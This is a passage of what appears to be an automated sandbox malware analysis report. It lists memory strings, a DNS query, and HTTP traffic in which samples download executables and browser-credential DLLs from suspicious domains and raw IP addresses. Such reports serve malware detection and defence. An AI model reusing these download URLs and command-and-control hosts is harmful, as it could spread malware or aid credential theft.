Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id13
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id14
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id15
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id16
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id17
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id18
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id19
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp, CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id2
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id20
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id21
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id22
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id23
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp, CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp, CBA.exe, 00000021.00000002.632885407.0000000003540000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id24
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id3
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id4
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id5
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id6
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id7
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id8
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id9
Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: svchost.exe, 00000007.00000002.305612043.000001A732013000.00000004.00000001.sdmp | String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 00000005.00000002.538342411.00000175AA83E000.00000004.00000001.sdmp | String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000005.00000002.538342411.00000175AA83E000.00000004.00000001.sdmp | String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000005.00000002.538342411.00000175AA83E000.00000004.00000001.sdmp | String found in binary or memory: https://activity.windows.com
Source: CBA.exe, 00000013.00000002.408243360.0000000004121000.00000004.00000001.sdmp, CBA.exe, 00000021.00000000.402116569.0000000000402000.00000040.00000001.sdmp, CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | String found in binary or memory: https://api.ip.sb/ip
Source: svchost.exe, 00000007.00000003.305173517.000001A732061000.00000004.00000001.sdmp | String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000005.00000002.538342411.00000175AA83E000.00000004.00000001.sdmp | String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000005.00000002.538342411.00000175AA83E000.00000004.00000001.sdmp | String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000007.00000003.305193025.000001A73205A000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000007.00000003.305193025.000001A73205A000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.305687704.000001A73205C000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000007.00000003.305173517.000001A732061000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000007.00000002.305659800.000001A73203C000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000007.00000003.305193025.000001A73205A000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.305687704.000001A73205C000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000007.00000003.305126285.000001A732068000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.305709993.000001A73206A000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 00000007.00000003.305173517.000001A732061000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000007.00000003.305271038.000001A73204E000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.305161130.000001A732048000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000007.00000003.305193025.000001A73205A000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.305687704.000001A73205C000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000007.00000003.305173517.000001A732061000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000007.00000002.305659800.000001A73203C000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000007.00000003.305173517.000001A732061000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000007.00000003.305173517.000001A732061000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000007.00000003.305173517.000001A732061000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000007.00000002.305669695.000001A732042000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000007.00000003.305214782.000001A732040000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.305241653.000001A732041000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.305669695.000001A732042000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 00000007.00000003.305173517.000001A732061000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000007.00000003.305193025.000001A73205A000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.305214782.000001A732040000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.305687704.000001A73205C000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000007.00000003.305193025.000001A73205A000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000007.00000003.305193025.000001A73205A000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.305687704.000001A73205C000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000007.00000003.305193025.000001A73205A000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.305687704.000001A73205C000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000007.00000003.305141180.000001A732064000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000007.00000003.305173517.000001A732061000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000007.00000002.305659800.000001A73203C000.00000004.00000001.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000007.00000003.283449741.000001A732031000.00000004.00000001.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: 4187.exe, 0000002A.00000002.553213817.0000000000ADD000.00000004.00000001.sdmp, 4187.exe, 0000002A.00000002.553183370.0000000000AC8000.00000004.00000001.sdmp | String found in binary or memory: https://t.me/capibar
Source: 4187.exe, 0000002A.00000002.553213817.0000000000ADD000.00000004.00000001.sdmp | String found in binary or memory: https://t.me/capibar.
Source: svchost.exe, 00000007.00000002.305659800.000001A73203C000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000007.00000002.305612043.000001A732013000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.305659800.000001A73203C000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000007.00000003.283449741.000001A732031000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000007.00000003.305233955.000001A732056000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 00000007.00000003.283449741.000001A732031000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                      Source: svchost.exe, 00000007.00000003.283449741.000001A732031000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.305650865.000001A73203A000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                      Source: svchost.exe, 00000007.00000003.305271038.000001A73204E000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.305161130.000001A732048000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                      Source: unknown | DNS traffic detected: queries for: host-data-coin-11.com
                      Source: C:\Users\user\AppData\Local\Temp\18D.exe | Code function: 18_2_00402A62 GetProcessHeap,GetProcessHeap,GetProcessHeap,HeapAlloc,socket,htons,select,recv,htons,htons,htons,GetProcessHeap,HeapAlloc,htons,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,closesocket,GetProcessHeap,HeapFree,
                      Source: global traffic | HTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: privacytools-foryou-777.com
                      Source: global traffic | HTTP traffic detected: GET /files/2184_1641247228_8717.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
                      Source: global traffic | HTTP traffic detected: GET /install5.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: unicupload.top
                      Source: global traffic | HTTP traffic detected: GET /game.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
                      Source: global traffic | HTTP traffic detected: GET /6.php HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 185.7.214.171:8080
                      Source: global traffic | HTTP traffic detected: GET /stlr/maps.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 91.243.44.130
                      Source: global traffic | HTTP traffic detected: GET /install1.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: unic11m.top
                      Source: global traffic | HTTP traffic detected: GET /install1.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: unicupload.top
                      Source: global traffic | HTTP traffic detected: GET /files/8584_1641133152_551.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
                      Source: global traffic | HTTP traffic detected: GET /POeNDXYchB.php HTTP/1.1 | Host: 185.7.214.239 | Connection: Keep-Alive | Cache-Control: no-cache
                      Source: global traffic | HTTP traffic detected: GET /crp.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: f0616068.xsph.ru
                      Source: global traffic | HTTP traffic detected: GET /sqlite3.dll HTTP/1.1 | Host: 185.7.214.239 | Cache-Control: no-cache | Cookie: PHPSESSID=9tonum6b55n3ncs7ru7lrdrlt3
                      Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: vk.com
                      Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: natribu.org
                      Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: natribu.org
                      Source: global traffic | HTTP traffic detected: GET /files/2972_1641266367_4755.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
                      Source: global traffic | HTTP traffic detected: GET /freebl3.dll HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Host: 65.108.180.72 | Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected: GET /freebl3.dll HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Host: 116.202.186.120 | Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected: GET /mozglue.dll HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Host: 65.108.180.72 | Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected: GET /msvcp140.dll HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Host: 65.108.180.72 | Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected: GET /nss3.dll HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Host: 65.108.180.72 | Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected: GET /mozglue.dll HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Host: 116.202.186.120 | Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected: GET /msvcp140.dll HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Host: 116.202.186.120 | Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected: GET /nss3.dll HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Host: 116.202.186.120 | Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected: GET /softokn3.dll HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Host: 116.202.186.120 | Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Host: 116.202.186.120 | Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected: GET /lava.exe HTTP/1.1 | Host: f0616071.xsph.ru | Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected: GET /Music.exe HTTP/1.1 | Host: f0616073.xsph.ru | Connection: Keep-Alive
                      Source: unknown | Network traffic detected: HTTP traffic on port 49842 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49864
                      Source: unknown | Network traffic detected: HTTP traffic on port 49779 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49861
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49780
                      Source: unknown | Network traffic detected: HTTP traffic on port 49894 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49852 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49814
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49857
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49779
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49856
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49855
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49778
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49777
                      Source: unknown | Network traffic detected: HTTP traffic on port 49841 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49889 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49853
                      Source: unknown | Network traffic detected: HTTP traffic on port 49866 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49852
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49851
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49895
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49894
                      Source: unknown | Network traffic detected: HTTP traffic on port 49780 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49855 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49851 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49882 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49861 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49777 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49889
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49887
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49920
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49842
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49841
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49883
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49882
                      Source: unknown | Network traffic detected: HTTP traffic on port 49857 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49797 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49883 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49904 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49778 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49887 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49797
                      Source: unknown | Network traffic detected: HTTP traffic on port 49864 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49814 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49856 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49895 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49853 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49904
                      Source: unknown | Network traffic detected: HTTP traffic on port 49920 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49866
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:32:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f6 1a b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:32:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 02 e9 1a d1 70 ae 59 4a d9 52 a6 be 67 e3 25 58 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOjpYJRg%XQAc}yc0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:32:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 